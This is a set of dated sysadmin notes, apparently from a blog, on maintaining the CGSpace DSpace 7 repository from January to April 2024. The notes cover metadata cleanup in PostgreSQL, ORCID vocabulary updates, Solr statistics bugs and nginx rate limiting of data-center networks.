https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS45102 \
https://asn.ipinfo.app/api/text/list/AS21859
$ cat AS* | sort | uniq | wc -l
4897
$ cat AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
2017 /tmp/networks.txt
```
- I'm surprised to see the number of networks reduced from my current ones... hmmm.
- I will also update my list of Bing networks:
```console
$ ./ilri/bing-networks-to-ips.sh
$ ~/go/bin/mapcidr -a < /tmp/bing-ips.txt > /tmp/bing-networks.txt
$ wc -l /tmp/bing-networks.txt
250 /tmp/bing-networks.txt
```
## 2024-01-08
- Export list of publishers for Peter to select some amount to use as a controlled vocabulary:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "dcterms.publisher", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 178 GROUP BY "dcterms.publisher" ORDER BY count DESC) to /tmp/2024-01-publishers.csv WITH CSV HEADER;
COPY 4332
```
- Address some feedback on DSpace 7 from users, including filing some issues on GitHub
- https://github.com/DSpace/dspace-angular/issues/2730: List of available metadata fields is truncated when adding new metadata in "Edit Item"
- The Alliance TIP team was having issues posting to one collection via the legacy DSpace 6 REST API
- In the DSpace logs I see the same issue that they had last month:
```
ERROR unknown unknown org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
```
## 2024-01-09
- I restarted Tomcat to see if it helps the REST issue
- After talking with Peter about publishers we decided to get a clean list of the top ~100 publishers and then make sure all CGIAR centers, Initiatives, and Impact Platforms are there as well
- I exported a list from PostgreSQL and then filtered by count > 40 in OpenRefine and then extracted the metadata values:
```
$ csvcut -c dcterms.publisher ~/Downloads/2024-01-09-publishers4.csv | sed -e 1d -e 's/"//g' > /tmp/top-publishers.txt
```
- Export a list of ORCID identifiers from PostgreSQL to look them up on ORCID and update our controlled vocabulary:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2024-01-09-orcid-identifiers.txt;
localhost/dspace7= ☘ \q
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2024-01-09-orcid-identifiers.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2024-01-09-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2024-01-09-orcids.txt -o /tmp/2024-01-09-orcids-names.txt -d
```
- Then I updated existing ORCID identifiers in CGSpace:
```
$ ./ilri/update_orcids.py -i /tmp/2024-01-09-orcids-names.txt -db dspace -u dspace -p bahhhh
```
- Bizu seems to be having issues due to belonging to too many groups
- I see some messages from Solr in the DSpace log:
```
2024-01-09 06:23:35,893 ERROR unknown unknown org.dspace.authorize.AuthorizeServiceImpl @ Failed getting getting community/collection admin status for bahhhhh@cgiar.org The search error is: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'search.resourcetype:Community AND (admin:eef481147-daf3-4fd2-bb8d-e18af8131d8c OR admin:g80199ef9-bcd6-4961-9512-501dea076607 OR admin:g4ac29263-cf0c-48d0-8be7-7f09317d50ec OR admin:g0e594148-a0f6-4f00-970d-6b7812f89540 OR admin:g0265b87a-2183-4357-a971-7a5b0c7add3a OR admin:g371ae807-f014-4305-b4ec-f2a8f6f0dcfa OR admin:gdc5cb27c-4a5a-45c2-b656-a399fded70de OR admin:ge36d0ece-7a52-4925-afeb-6641d6a348cc OR admin:g15dc1173-7ddf-43cf-a89a-77a7f81c4cfc OR admin:gc3a599d3-c758-46cd-9855-c98f6ab58ae4 OR admin:g3d648c3e-58c3-4342-b500-07cba10ba52d OR admin:g82bf5168-65c1-4627-8eb4-724fa0ea51a7 OR admin:ge751e973-697d-419c-b59b-5a5644702874 OR admin:g44dd0a80-c1e6-4274-9be4-9f342d74928c OR admin:g4842f9c2-73ed-476a-a81a-7167d8aa7946 OR admin:g5f279b3f-c2ce-4c75-b151-1de52c1a540e OR admin:ga6df8adc-2e1d-40f2-8f1e-f77796d0eecd OR admin:gfdfc1621-382e-437a-8674-c9007627565c OR admin:g15cd114a-0b89-442b-a1b4-1febb6959571 OR admin:g12aede99-d018-4c00-b4d4-a732541d0017 OR admin:gc59529d7-002a-4216-b2e1-d909afd2d4a9 OR admin:gd0806714-bc13-460d-bedd-121bdd5436a4 OR admin:gce70739a-8820-4d56-b19c-f191855479e4 OR admin:g7d3409eb-81e3-4156-afb1-7f02de22065f OR admin:g54bc009e-2954-4dad-8c30-be6a09dc5093 OR admin:gc5e1d6b7-4603-40d7-852f-6654c159dec9 OR admin:g0046214d-c85b-4f12-a5e6-2f57a2c3abb0 OR admin:g4c7b4fd0-938f-40e9-ab3e-447c317296c1 OR admin:gcfae9b69-d8dd-4cf3-9a4e-d6e31ff68731 OR ... admin:g20f366c0-96c0-4416-ad0b-46884010925f)': too many boolean clauses The search resourceType filter was: search.resourcetype:Community
```
- There are 1,805 OR clauses in the full log!
- We previously had this issue in 2020-01 and 2020-02 with DSpace 5 and DSpace 6
- At the time the solution was to increase the `maxBooleanClauses` in Solr and to disable access rights awareness, but I don't think we want to do the second one now
- I saw many users of Solr in other applications increasing this to obscenely high numbers, so I think we should be OK to increase it from 1024 to 2048
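- For reference, this is a per-core setting in `solrconfig.xml`, and since Solr 8.1 there is also a global cap in `solr.xml` that needs to be at least as high; a sketch of the two settings (the exact file locations depend on the Solr layout):
```
<!-- solrconfig.xml, inside the <query> section of the core's config -->
<maxBooleanClauses>2048</maxBooleanClauses>

<!-- solr.xml -->
<int name="maxBooleanClauses">${solr.max.booleanClauses:2048}</int>
```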
- Re-visiting the DSpace user groomer to delete inactive users
- In 2023-08 I noticed that this was now [possible in DSpace 7](https://github.com/DSpace/DSpace/pull/2928)
- As a test I tried to delete all users who have been inactive since six years ago (January 9, 2018):
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 01/09/2018 -d
```
- I tested it on DSpace 7 Test and it worked... I am debating running it on CGSpace...
- I see we have almost 9,000 users:
```console
$ dspace user -L > /tmp/users-before.txt
$ wc -l /tmp/users-before.txt
8943 /tmp/users-before.txt
```
- I decided to do the same on CGSpace and it worked without errors
- I finished working on the controlled vocabulary for publishers
## 2024-01-10
- I spent some time deleting old groups on CGSpace
- I looked into the use of the `cg.identifier.ciatproject` field and found there are only a handful of uses, with some even seeming to be a mistake:
```console
localhost/dspace7= ☘ SELECT DISTINCT text_value AS "cg.identifier.ciatproject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 232 GROUP BY "cg.identifier.ciatproject" ORDER BY count DESC;
 cg.identifier.ciatproject │ count
───────────────────────────┼───────
 D145                      │     4
 LAM_LivestockPlus         │     2
 A215                      │     1
 A217                      │     1
 A220                      │     1
 A223                      │     1
 A224                      │     1
 A227                      │     1
 A229                      │     1
 A230                      │     1
 CLIMATE CHANGE MITIGATION │     1
 LIVESTOCK                 │     1
(12 rows)
Time: 240.041 ms
```
- I think we can move those to a new `cg.identifier.project` if we create one
- The `cg.identifier.cpwfproject` field is similarly sparse, but the CCAFS ones are widely used
## 2024-01-12
- Export a list of affiliations to do some cleanup:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 211 GROUP BY "cg.contributor.affiliation" ORDER BY count DESC) to /tmp/2024-01-affiliations.csv WITH CSV HEADER;
COPY 11719
```
- I first did some clustering and editing in OpenRefine, then I'll import those back into CGSpace and then do another export
- Troubleshooting the statistics pages that aren't working on DSpace 7
- On a hunch, I queried for Solr statistics documents that **did not have an `id` matching the 36-character UUID pattern**:
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&rows=0'
{
  "responseHeader":{
    "status":0,
    "QTime":0,
    "params":{
      "q":"-id:/.{36}/",
      "rows":"0"}},
  "response":{"numFound":800167,"start":0,"numFoundExact":true,"docs":[]
  }}
```
- They seem to come mostly from 2020, 2023, and 2024:
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&facet.range=time&facet=true&facet.range.start=2010-01-01T00:00:00Z&facet.range.end=NOW&facet.range.gap=%2B1YEAR&rows=0'
{
  "responseHeader":{
    "status":0,
    "QTime":13,
    "params":{
      "facet.range":"time",
      "q":"-id:/.{36}/",
      "facet.range.gap":"+1YEAR",
      "rows":"0",
      "facet":"true",
      "facet.range.start":"2010-01-01T00:00:00Z",
      "facet.range.end":"NOW"}},
  "response":{"numFound":800168,"start":0,"numFoundExact":true,"docs":[]
  },
  "facet_counts":{
    "facet_queries":{},
    "facet_fields":{},
    "facet_ranges":{
      "time":{
        "counts":[
          "2010-01-01T00:00:00Z",0,
          "2011-01-01T00:00:00Z",0,
          "2012-01-01T00:00:00Z",0,
          "2013-01-01T00:00:00Z",0,
          "2014-01-01T00:00:00Z",0,
          "2015-01-01T00:00:00Z",89,
          "2016-01-01T00:00:00Z",11,
          "2017-01-01T00:00:00Z",0,
          "2018-01-01T00:00:00Z",0,
          "2019-01-01T00:00:00Z",0,
          "2020-01-01T00:00:00Z",1339,
          "2021-01-01T00:00:00Z",0,
          "2022-01-01T00:00:00Z",0,
          "2023-01-01T00:00:00Z",653736,
          "2024-01-01T00:00:00Z",144993],
        "gap":"+1YEAR",
        "start":"2010-01-01T00:00:00Z",
        "end":"2025-01-01T00:00:00Z"}},
    "facet_intervals":{},
    "facet_heatmaps":{}}}
```
- They seem to come from 2023-08 until now (so way before we migrated to DSpace 7):
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&facet.range=time&facet=true&facet.range.start=2023-01-01T00:00:00Z&facet.range.end=NOW&facet.range.gap=%2B1MONTH&rows=0'
{
  "responseHeader":{
    "status":0,
    "QTime":196,
    "params":{
      "facet.range":"time",
      "q":"-id:/.{36}/",
      "facet.range.gap":"+1MONTH",
      "rows":"0",
      "facet":"true",
      "facet.range.start":"2023-01-01T00:00:00Z",
      "facet.range.end":"NOW"}},
  "response":{"numFound":800168,"start":0,"numFoundExact":true,"docs":[]
  },
  "facet_counts":{
    "facet_queries":{},
    "facet_fields":{},
    "facet_ranges":{
      "time":{
        "counts":[
          "2023-01-01T00:00:00Z",1,
          "2023-02-01T00:00:00Z",0,
          "2023-03-01T00:00:00Z",0,
          "2023-04-01T00:00:00Z",0,
          "2023-05-01T00:00:00Z",0,
          "2023-06-01T00:00:00Z",0,
          "2023-07-01T00:00:00Z",0,
          "2023-08-01T00:00:00Z",27621,
          "2023-09-01T00:00:00Z",59165,
          "2023-10-01T00:00:00Z",115338,
          "2023-11-01T00:00:00Z",96147,
          "2023-12-01T00:00:00Z",355464,
          "2024-01-01T00:00:00Z",125429],
        "gap":"+1MONTH",
        "start":"2023-01-01T00:00:00Z",
        "end":"2024-02-01T00:00:00Z"}},
    "facet_intervals":{},
    "facet_heatmaps":{}}}
```
- I see that we had 31,744 statistic events yesterday, and 799 have no `id`!
- I asked about this on Slack and will file an issue on GitHub if someone else also finds such records
- Several people said they have them, so it's a bug of some sort in DSpace, not our configuration
## 2024-01-13
- Yesterday alone we had 37,000 unique IPs making requests to nginx
- I looked up the ASNs and found 6,000 IPs from this network in Amazon Singapore: 47.128.0.0/14
## 2024-01-15
- Investigating the CSS selector warning that I've seen in PM2 logs:
```console
0|dspace-ui | 1 rules skipped due to selector errors:
0|dspace-ui | .custom-file-input:lang(en)~.custom-file-label -> unmatched pseudo-class :lang
```
- It seems to be a bug in Angular, as this selector comes from Bootstrap 4.6.x and is not invalid
- But that led me to a more interesting issue with `inlineCritical` optimization for styles in Angular SSR that might be responsible for causing high load in the frontend
- See: https://github.com/angular/angular/issues/42098
- See: https://github.com/angular/universal/issues/2106
- See: https://github.com/GoogleChromeLabs/critters/issues/78
- Since the production site was flapping a lot I decided to try disabling inlineCriticalCss
- There have been on and off load issues with the Angular frontend today
- I think I will just block all data center network blocks for now
- In the last week I see almost 200,000 unique IPs:
```console
# zcat -f /var/log/nginx/*access.log /var/log/nginx/*access.log.1 /var/log/nginx/*access.log.2.gz /var/log/nginx/*access.log.3.gz /var/log/nginx/*access.log.4.gz /var/log/nginx/*access.log.5.gz /var/log/nginx/*access.log.6.gz | awk '{print $1}' | sort -u |
tee /tmp/ips.txt | wc -l
196493
```
- Looking these IPs up I see there are 18,000 coming from Comcast, 10,000 from AT&T, 4110 from Charter, 3500 from Cox and dozens of other residential IPs
- I highly doubt these are home users browsing CGSpace... seems super fishy
- Also, over 1,000 IPs from SpaceX Starlink in the last week. RIGHT
- I will temporarily add a few new datacenter ISP network blocks to our rate limit:
- 16509 Amazon-02
- 701 UUNET
- 8075 Microsoft
- 15169 Google
- 14618 Amazon-AES
- 396982 Google Cloud
- The load on the server *immediately* dropped
## 2024-01-17
- It turns out AS701 (UUNET) is Verizon Business, which is used as an ISP for many staff at IFPRI
- This was causing them to see HTTP 429 "too many requests" errors on CGSpace
- I removed this ASN from the rate limiting
## 2024-01-18
- Start looking at Solr stats again
- I found one statistics record that has 22,000 of the same collection in `owningColl` and 22,000 of the same community in `owningComm`
- The record is from 2015 and I think it would be easier to delete it than fix it:
```console
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<delete><query>uid:3b4eefba-a302-4172-a286-dcb25d70129e</query></delete>'
```
- Looking again, there are at least 1,000 of these so I will need to come up with an actual solution to fix these
- I'm noticing we have 1,800+ links to defunct resources on bioversityinternational.org in the `cg.link.permalink` field
- I should ask Alliance if they have any plans to fix those, or upload them to CGSpace
## 2024-01-22
- Meeting with IWMI about ORCID integration on CGSpace now that we've migrated to DSpace 7
- File an issue for the inaccurate DSpace statistics: https://github.com/DSpace/DSpace/issues/9275
## 2024-01-23
- Meeting with IWMI about ORCID integration and the DSpace API for use with WordPress
- IFPRI sent me a list of their author ORCIDs to add to our controlled vocabulary
- I joined them with our current list and resolved their names on ORCID and updated them in our database:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/IFPRI\ ORCiD\ All.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2024-01-23-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2024-01-23-orcids.txt -o /tmp/2024-01-23-orcids-names.txt -d
$ ./ilri/update_orcids.py -i /tmp/2024-01-23-orcids-names.txt -db dspace -u dspace -p fuuu
```
- This adds about 400 new identifiers to the controlled vocabulary
- I consolidated our various project identifier fields for closed programs into one `cg.identifier.project`:
- `cg.identifier.ccafsproject`
- `cg.identifier.ccafsprojectpii`
- `cg.identifier.ciatproject`
- `cg.identifier.cpwfproject`
- I prefixed the existing 2,644 metadata values with "CCAFS", "CIAT", or "CPWF" so we can figure out where they came from if need be, and deleted the old fields from the metadata registry
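- A sketch of what that kind of migration looks like in PostgreSQL (the metadata_field_id values and prefix format here are placeholders, not the real ones):
```console
dspace=# BEGIN;
dspace=*# -- prefix the old CCAFS project values so we can tell where they came from
dspace=*# UPDATE metadatavalue SET text_value='CCAFS: ' || text_value WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=235;
dspace=*# -- then move them to the new cg.identifier.project field
dspace=*# UPDATE metadatavalue SET metadata_field_id=251 WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=235;
dspace=*# COMMIT;
```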
## 2024-01-26
- Minor work on dspace-angular to clean up component styles
- Add `cg.identifier.publicationRank` to CGSpace metadata registry and submission form
## 2024-01-29
- Rework the nginx bot and network limits slightly to remove some old patterns/networks and remove Google
- The Google Scholar team contacted me to ask why their requests were timing out (well...)
<!-- vim: set sw=2 ts=2: -->

118
content/posts/2024-02.md Normal file

@ -0,0 +1,118 @@
---
title: "February, 2024"
date: 2024-02-05T11:10:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-02-05
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Lower case all the AGROVOC subjects on CGSpace
<!--more-->
```sql
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 180
dspace=*# COMMIT;
COMMIT
```
## 2024-02-06
- Discuss IWMI using the CGSpace REST API for their new website
- Export the IWMI community to extract their ORCID identifiers:
```console
$ dspace metadata-export -i 10568/16814 -f /tmp/iwmi.csv
$ csvcut -c 'cg.creator.identifier,cg.creator.identifier[en_US]' ~/Downloads/2024-02-06-iwmi.csv \
| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' \
| sort -u \
| tee /tmp/iwmi-orcids.txt \
| wc -l
353
$ ./ilri/resolve_orcids.py -i /tmp/iwmi-orcids.txt -o /tmp/iwmi-orcids-names.csv -d
```
- I noticed some similar looking names in our list so I clustered them in OpenRefine and manually checked a dozen or so to update our list
## 2024-02-07
- Maria asked me about the "missing" item from last week again
- I can see it when I used the Admin search, but not in her workflow
- It was submitted by TIP so I checked that user's workspace and found it there
- After depositing, it went into the workflow so Maria should be able to see it now
## 2024-02-09
- Minor edits to CGSpace submission form
- Upload 55 ISNAR book chapters to CGSpace from Peter
## 2024-02-19
- Looking into the collection mapping issue on CGSpace
- It seems to be by design in DSpace 7: https://github.com/DSpace/dspace-angular/issues/1203
- This is a massive setback for us...
## 2024-02-20
- Minor work on OpenRXV to fix a bug in the ng-select drop downs
- Minor work on the DSpace 7 nginx configuration to allow requesting robots.txt and sitemaps without hitting rate limits
## 2024-02-21
- Minor updates on OpenRXV, including one bug fix for missing mapped collections
- Salem had to re-work the harvester for DSpace 7 since the mapped collections and parent collection list are separate!
## 2024-02-22
- Discuss tagging of datasets and re-work the submission form to encourage use of DOI field for any item that has a DOI, and the normal URL field if not
- The "cg.identifier.dataurl" field will be used for "related" datasets
- I still have to check and move some metadata for existing datasets
## 2024-02-23
- This morning Tomcat died due to an OOM kill from the kernel:
```console
kernel: Out of memory: Killed process 698 (java) total-vm:14151300kB, anon-rss:9665812kB, file-rss:320kB, shmem-rss:0kB, UID:997 pgtables:20436kB oom_score_adj:0
```
- I don't see any abnormal pattern in my Grafana graphs, for JVM or system load... very weird
- I updated the submission form on CGSpace to include the new changes to URLs for datasets
- I also updated about 80 datasets to move the URLs to the correct field
## 2024-02-25
- This morning Tomcat died while I was doing a CSV export, with an OOM kill from the kernel:
```console
kernel: Out of memory: Killed process 720768 (java) total-vm:14079976kB, anon-rss:9301684kB, file-rss:152kB, shmem-rss:0kB, UID:997 pgtables:19488kB oom_score_adj:0
```
- I don't know why this is happening so often recently...
## 2024-02-27
- IFPRI sent me a list of authors to add to our list for now, until we can find a better way of doing it
- I extracted the existing authors from our controlled vocabulary and combined them with IFPRI's:
```console
$ xmllint --xpath '//node/isComposedBy/node()' dspace/config/controlled-vocabularies/dc-contributor-author.xml \
| grep -oE 'label=".*"' \
| sed -e 's/label="//' -e 's/"$//' > /tmp/authors
$ cat /tmp/authors /tmp/ifpri-authors | sort -u > /tmp/new-authors
```
## 2024-02-28
- I figured out a way to add a new Angular component to handle all our relation fields
## 2024-02-29
- Clean up a bunch of metadata on CGSpace
<!-- vim: set sw=2 ts=2: -->

207
content/posts/2024-03.md Normal file

@ -0,0 +1,207 @@
---
title: "March, 2024"
date: 2024-03-01T09:55:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-03-01
- Last week Bizu reported an issue with the "browse by issue date" drop down
- I verified it, and suspect it could be due to missing issue dates...
- It might be this issue: https://github.com/DSpace/dspace-angular/issues/2808
<!--more-->
- I spent some time trying to reproduce the bug affecting `onebox` fields that are configured to use external vocabularies and are not repeatable
- I filed an issue: https://github.com/DSpace/dspace-angular/issues/2846
## 2024-03-03
- I did some cleanups on abstracts, licenses, and dates from CrossRef
- I also did some minor cleanups to affiliations because I saw some incorrect and duplicate ones in our list
## 2024-03-05
- I tried a new technique to get some affiliations from Crossref using OpenRefine
- First I split them and clustered, resolving a few hundred clusters out of 1500 (!)
- Then I used a custom text facet with a few dozen CGIAR and other large affiliations to reduce the work
- Then I joined them with our affiliations, paying no attention to duplicates
- Then I deduped them using the Jython technique I learned in 2023-02
## 2024-03-06
- Peter sent me some more corrections for the authors that I had sent him in 2023-12
## 2024-03-08
- IFPRI sent me their 2023 records from CONTENTdm so I started working on those
- I found a way to match their ORCID identifiers in our list using Jython in OpenRefine:
```python
import re
with open(r"/tmp/cg-creator-identifier.txt", 'r') as f:
    orcid_ids = [orcid_id.strip() for orcid_id in f]
matched = False
for orcid_id in orcid_ids:
    if re.search(r'.+: {}'.format(value), orcid_id):
        matched = True
        break
if matched:
    return orcid_id
else:
    return value
```
- I realized that [UNICEF was renamed to its current name in 1953](https://www.unicef.org/about-unicef/frequently-asked-questions#3) so I replaced all other variations in our vocabularies and metadata:
```sql
UPDATE metadatavalue SET text_value='United Nations Children''s Fund' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value IN ('United Nations International Children''s Emergency Fund', 'United Nations International Children''s Emergency Fund', 'UNICEF');
```
- Note the use of two single quotes to escape the one in the name
## 2024-03-11
- Experimenting with moving some of my Python scripts to the DSpace 7 REST API
- I need a way to get UUIDs for Handles...
- Seems that I can use a Discovery query like: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&query=handle:10568/130864
- Then just take the first result...?
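- A quick sketch of that lookup in Python with `requests` (the embedded response structure shown here is an assumption based on what the endpoint appears to return on DSpace 7):
```python
import requests

def handle_to_uuid(handle, base="https://dspace7test.ilri.org/server"):
    # Ask Discovery for items matching the handle and take the first hit
    params = {"dsoType": "item", "query": f"handle:{handle}"}
    r = requests.get(f"{base}/api/discover/search/objects", params=params)
    r.raise_for_status()

    objects = r.json()["_embedded"]["searchResult"]["_embedded"]["objects"]
    if not objects:
        return None

    return objects[0]["_embedded"]["indexableObject"]["uuid"]

print(handle_to_uuid("10568/130864"))
```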
- I spent some time working on the script get abstracts from CGSpace, and found a bug in my logic
- I also noticed that one item had two abstracts, but the first one was blank!
- Looking deeper, I found 113 blank metadata values so I deleted those:
```sql
BEGIN;
DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='';
COMMIT;
```
- I also found a few dozen items with "N/A" for their citation, so I deleted those too:
```sql
BEGIN;
DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='N/A' AND metadata_field_id=146;
COMMIT;
```
- I deployed the change to disable Angular SSR's `inlineCriticalCss` on production because we had heavy load on the frontend and I've been meaning to do this permanently for some time
- Maria asked me for a CSV with all the broken Bioversity permalinks so I exported them for her:
```console
$ csvcut -c 'id,dc.title[en_US],dc.identifier.uri[en_US],cg.link.permalink[en_US]' ~/Downloads/2024-03-05-cgspace.csv \
| csvgrep -c 'cg.link.permalink[en_US]' -r '^.+$' > /tmp/2024-03-11-Bioversity-Permalinks.csv
```
## 2024-03-12
- Run the duplicate checker for IFPRI 2023 batch upload
## 2024-03-13
- I found about 428 duplicates in the IFPRI 2023 batch records
- Alarmingly, I found about 18 that are duplicated on CGSpace as well!
- I looked closer and decided that 11 were duplicates, so I merged the metadata and withdrew the later ones
- Alliance asked me to get him the Handles for items submitted by TIP that are not discoverable
- I found it easiest to use the `ds6_item2itemhandle` [DSpace SQL helper function](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) with a nested query on the provenance:
```sql
SELECT ds6_item2itemhandle(dspace_object_id) AS handle FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item WHERE NOT discoverable) AND metadata_field_id=28 AND text_value LIKE 'Submitted by Alliance TIP Submit%';
```
## 2024-03-14
- Looking into reports of rate limiting of Altmetric's bot on CGSpace
- I don't see any HTTP 429 responses for their user agents in any of our logs...
- I tried myself on an item page and never hit a limit...
```console
$ for num in {1..60}; do echo -n "Request ${num}: "; curl -s -o /dev/null -w "%{http_code}" https://dspace7test.ilri.org/items/c9b8999d-3001-42ba-a267-14f4bfa90b53 && echo; done
Request 1: 200
Request 2: 200
Request 3: 200
Request 4: 200
...
Request 60: 200
```
- All responses were HTTP 200...
- In any case, I whitelisted their production IPs and told them to try again
- I imported 468 of IFPRI's 2023 records that were confirmed to not be duplicates to CGSpace
- I also spent some time merging metadata from 415 of the remaining 432 duplicates with the metadata for the existing items on CGSpace
- This was a bit of dirty work using csvkit, xsv, and OpenRefine
## 2024-03-17
- There are 17 records from IFPRI's 2023 batch that are remaining from the 432 that I identified as already being on CGSpace
- These are different in that they are duplicates on CGSpace as well, so the csvjoin failed and the metadata got messed up in my migration
- I looked closer and whittled this down to 14 actual records, and spent some time working on them
- I isolated 12 of these items that existed on CGSpace and added publication ranks, project identifiers, and provenance links
- Now there only remain two confusing records about the Inkomati catchment
## 2024-03-18
- Checking to see how many IFPRI records we have migrated so far:
```console
$ csvgrep -c 'dc.description.provenance[en_US]' -m 'Original URL from IFPRI CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.title[en_US],dc.identifier.uri[en_US],dc.description.provenance[en_US],dcterms.type[en_US]' \
| tee /tmp/ifpri-records.csv \
| csvstat --count
898
```
- I finalized the remaining two on Inkomati catchment and now we are at 900!
## 2024-03-19
- IWMI sent me some new author ORCID identifiers so I updated our list
- Started working on updating my data for the Ontology CoP webinar on CGIAR and AGROVOC
- First extracting all unique subjects on CGSpace:
```
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119)) to /tmp/2024-03-19-cgspace-subjects.csv WITH CSV HEADER;
COPY 28024
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2024-03-19-cgspace-subjects.csv | sed '1d' > /tmp/2024-03-19-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2024-03-19-cgspace-subjects.txt -o /tmp/2024-03-19-cgspace-subjects-results.csv
```
## 2024-03-20
- Identify seven duplicates on CGSpace from the PRMS results and withdraw them from CGSpace
## 2024-03-21
- Look more closely at duplicates on CGSpace based on a fresh export
- Using DOIs I found ~842 that occur more than once for journal articles alone, so probably around 400 duplicates
- I did a handful of them, merging the metadata and withdrawing the duplicate, and decided to add `dcterms.replaces` with the handle in the original
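- A quick way to see the repeated DOIs is a GROUP BY on the DOI field in PostgreSQL, something like:
```console
localhost/dspace7= ☘ SELECT LOWER(text_value) AS doi, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 GROUP BY doi HAVING COUNT(*) > 1 ORDER BY COUNT(*) DESC;
```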
## 2024-03-22
- Look at duplicate DOIs on CGSpace and address a dozen or so
## 2024-03-23
- Look at duplicate DOIs on CGSpace and address a dozen or so
- Update Tomcat and Solr to latest versions
- I had done some tests with these last week, and did a last minute test on DSpace 7 Test to make sure submission and searching worked
## 2024-03-24
- Slowly process several dozen more duplicate DOIs on CGSpace, sigh...
## 2024-03-26
- File an issue on dspace-angular about improving withdrawn item tombstones: https://github.com/DSpace/dspace-angular/issues/2880
- Merge metadata and withdraw more duplicates on CGSpace
<!-- vim: set sw=2 ts=2: -->

169
content/posts/2024-04.md Normal file

@ -0,0 +1,169 @@
---
title: "April, 2024"
date: 2024-04-04T10:23:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-04-04
- Work on CGSpace duplicate DOIs more
<!--more-->
## 2024-04-08
- Start working on IFPRI's 2022 batch import
- I ran the duplicate checker against CGSpace and started downloading all linked PDFs
## 2024-04-09
- Continue working on IFPRI's 2022 batch import
- I started validating the potential duplicates in OpenRefine
## 2024-04-12
- Finish working on the 650 IFPRI 2022 records that were not already on CGSpace, then uploaded them
- I need to merge the metadata for the remaining 212 that are already on CGSpace
- Spend some time looking at duplicate DOIs again...
## 2024-04-13
- Spend some time looking at duplicate DOIs again...
## 2024-04-14
- Spend some time looking at duplicate DOIs again...
## 2024-04-15
- Spend some time looking at duplicate DOIs again...
- Delete ~260 duplicate metadata values using the elaborate SQL and sort method I documented here: https://github.com/DSpace/DSpace/issues/8253#issuecomment-1331756418
- Tony noticed that the DSpace 7 REST API is very slow with the embeds so I profiled a bit:
```
$ time curl -s -o /dev/null 'https://cgspace.cgiar.org/server/api/discover/search/objects?query=cg.identifier.project%3AIFPRI*&scope=8f1e9650-fe87-4e6e-889a-1cacfb747408&page=0&size=100&embed=thumbnail,bundles/bitstreams&sort=dcterms.issued,desc'
curl -s -o /dev/null 0.01s user 0.01s system 0% cpu 47.515 total
$ time curl -s -o /dev/null 'https://cgspace.cgiar.org/server/api/discover/search/objects?query=cg.identifier.project%3AIFPRI*&scope=8f1e9650-fe87-4e6e-889a-1cacfb747408&page=0&size=100&sort=dcterms.issued,desc'
curl -s -o /dev/null 0.01s user 0.01s system 0% cpu 4.764 total
```
- Finalize processing the remaining 206 items from the IFPRI 2022 batch set that already existed on CGSpace
- I merged metadata with the existing items
- There are still six remaining items that I identified as being duplicates (3x2) in the IFPRI set itself
